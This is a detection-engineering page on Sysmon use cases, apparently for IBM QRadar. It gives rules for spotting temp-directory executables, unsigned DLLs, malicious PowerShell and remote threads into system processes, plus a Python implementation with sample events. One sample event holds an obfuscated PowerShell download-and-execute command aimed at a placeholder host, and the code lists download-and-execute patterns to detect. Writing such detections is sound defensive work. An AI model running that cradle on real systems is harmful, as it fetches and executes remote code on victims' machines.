Sysmon Usecases (IBM)

Introduction

  • Sysmon is a tool that adds visibility on top of the standard Windows logs, covering activity that normal event logging does not usually capture, for example code injection, PowerShell command lines and process mitigations.

Use Case 01 - Malicious File Injection and Execution

Scenario:

  • An attacker uses a PowerShell script that downloads a malicious backdoor and runs it from the temp directory.

Red Flags:

  • The process started from a temp directory.

  • Unsigned EXE or DLL.

  • PowerShell commands that download and start processes.

Rules:

Unsigned Executable or DLL Loaded from Temp Directory

  • Events which are detected by the local system.

  • Events were detected by one or more of Microsoft Windows Security Event Log.

  • Event QID is one of the following (5001844) Image Loaded.

  • Event matches LoadedImage (custom) matches any of expressions <Temp Directory Path Regex>.

Process Launched from Temp Directory

  • Events which are detected by the local system.

  • Events were detected by one or more of Microsoft Windows Security Event Log.

  • Event QID is one of the following (5001828) Process Create.

  • Event matches Image (custom) matches any of expressions <Temp Directory Path Regex>.

PowerShell Malicious Usage Detected

  • Events which are detected by the local system.

  • Events were detected by one or more of Microsoft Windows Security Event Log.

  • Event QID is one of the following (5001828) Process Create.

  • Event matches Process CommandLine (custom) is not NA.

  • Event matches Process CommandLine (custom) matches <Malicious Commands Regex>. (Make the regex case insensitive and account for filler characters that the shell ignores, so obfuscated variants of the same command still match.)

Process Created a Thread into System Process

  • Events which are detected by the local system.

  • Events were detected by one or more of Microsoft Windows Security Event Log.

  • Event QID is one of the following (5001845) CreateRemoteThread.

  • Event matches Process CommandLine (custom) is not NA.

  • Any of Target Image Name (custom) is contained in any of Windows Sensitive Processes (a reference set listing the sensitive Windows processes).
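
The four rules above, run as plain detection logic over a handful of constructed Sysmon events, as an added example that is not part of the original page and not QRadar's own rule engine. The temp-directory pattern, the malicious-command pattern and the sensitive-process set are stand-ins for the page's <Temp Directory Path Regex>, <Malicious Commands Regex> and reference set, and are assumptions. Two points go beyond the rule text as written: the command-line check normalises away backticks, carets, quotes and plus signs before matching, which is what the "escape useless characters" note asks for, and the image-loaded rule also tests Sysmon's Signed field, since the page's rule tests only the path even though its title calls for unsigned images.

```python
import ntpath
import re
from typing import Dict, Iterable, List

# Sysmon event IDs behind the QRadar QIDs named on the page
# (5001828 -> Process Create, 5001844 -> Image Loaded, 5001845 -> CreateRemoteThread).
PROCESS_CREATE, IMAGE_LOADED, CREATE_REMOTE_THREAD = 1, 7, 8

# Assumed stand-in for <Temp Directory Path Regex>: a "Temp" or "tmp" path component.
TEMP_DIR_RE = re.compile(r"[\\/](temp|tmp)[\\/]", re.IGNORECASE)

# Assumed stand-in for <Malicious Commands Regex>: the download-and-execute
# primitives the scenario relies on. Case-insensitive, per the page's note.
MALICIOUS_CMD_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-process|"
    r"invoke-expression|\biex\b|-e(?:nc|ncodedcommand)?\b|frombase64string",
    re.IGNORECASE,
)

# Assumed stand-in for the "Windows Sensitive Processes" reference set.
SENSITIVE_PROCESSES = {
    "lsass.exe", "csrss.exe", "winlogon.exe", "wininit.exe", "services.exe", "svchost.exe",
}

# Characters a shell ignores but which break naive substring matches.
FILLER_CHARS_RE = re.compile(r"[`^\"'+]")


def normalize_cmdline(cmdline: str) -> str:
    """Strip filler characters and collapse whitespace so that I`EX, "I"+"EX"
    and I^EX all read as IEX before the regex is applied."""
    return re.sub(r"\s+", " ", FILLER_CHARS_RE.sub("", cmdline)).strip()


def evaluate_event(event: Dict[str, object]) -> List[str]:
    """Return the names of the page's rules that fire for one Sysmon event."""
    hits: List[str] = []
    eid = event.get("EventID")
    if eid == IMAGE_LOADED:
        # Page rule: ImageLoaded in a temp directory. Added here (assumption):
        # the Sysmon Signed field must also be "false".
        if TEMP_DIR_RE.search(str(event.get("ImageLoaded", ""))) and \
                str(event.get("Signed", "false")).lower() == "false":
            hits.append("Unsigned Executable or DLL Loaded from Temp Directory")
    elif eid == PROCESS_CREATE:
        if TEMP_DIR_RE.search(str(event.get("Image", ""))):
            hits.append("Process Launched from Temp Directory")
        cmdline = event.get("CommandLine")  # "is not NA" test: field must be present
        if cmdline and MALICIOUS_CMD_RE.search(normalize_cmdline(str(cmdline))):
            hits.append("PowerShell Malicious Usage Detected")
    elif eid == CREATE_REMOTE_THREAD:
        # Compare the target's file name against the sensitive-process set.
        target = ntpath.basename(str(event.get("TargetImage", ""))).lower()
        if target in SENSITIVE_PROCESSES:
            hits.append("Process Created a Thread into System Process")
    return hits


def scan(events: Iterable[Dict[str, object]]) -> Dict[str, List[int]]:
    """Map each rule name to the indexes of the events that fired it."""
    fired: Dict[str, List[int]] = {}
    for index, event in enumerate(events):
        for rule in evaluate_event(event):
            fired.setdefault(rule, []).append(index)
    return fired


# Constructed sample events mirroring the scenario (not real telemetry).
TEMP_EXE = r"C:\Users\alice\AppData\Local\Temp\update.exe"
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"EventID": 1, "Image": TEMP_EXE, "CommandLine": TEMP_EXE},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -c I`EX(New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/p')"},
    {"EventID": 7, "Image": TEMP_EXE, "Signed": "false",
     "ImageLoaded": r"C:\Users\alice\AppData\Local\Temp\helper.dll"},
    {"EventID": 8, "SourceImage": TEMP_EXE, "TargetImage": r"C:\Windows\System32\lsass.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\alice\notes.txt"},
    {"EventID": 7, "Image": r"C:\Windows\System32\notepad.exe", "Signed": "true",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll"},
]

if __name__ == "__main__":
    for rule, indexes in scan(SAMPLE_EVENTS).items():
        print(f"{rule}: events {indexes}")
```

The benign notepad events fire nothing, while the four events from the scenario each trigger exactly one rule. Tune the two patterns and the reference set to the environment before deploying; a bare `-e` alternative in the command regex, for instance, deliberately requires a word boundary so that `-ep` is not caught.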
